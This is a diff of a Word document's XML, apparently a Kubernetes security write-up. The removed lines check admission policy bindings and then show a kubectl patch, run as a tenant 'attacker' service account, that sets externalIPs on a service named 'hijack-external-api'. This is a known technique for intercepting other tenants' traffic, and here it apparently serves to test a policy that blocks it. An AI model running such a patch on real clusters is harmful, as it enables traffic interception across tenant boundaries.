-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> get </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>validatingadmissionpolicybinding</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n tenant-b patch service hijack-external-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>api</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  --type=merge \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  -</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>p '{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"spec</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>":{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>externalIPs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>":[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"192.0.2.123</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"]}}</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  --as=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>system:serviceaccount</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:tenant-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>b:attacker</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -16356,6 +15255,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
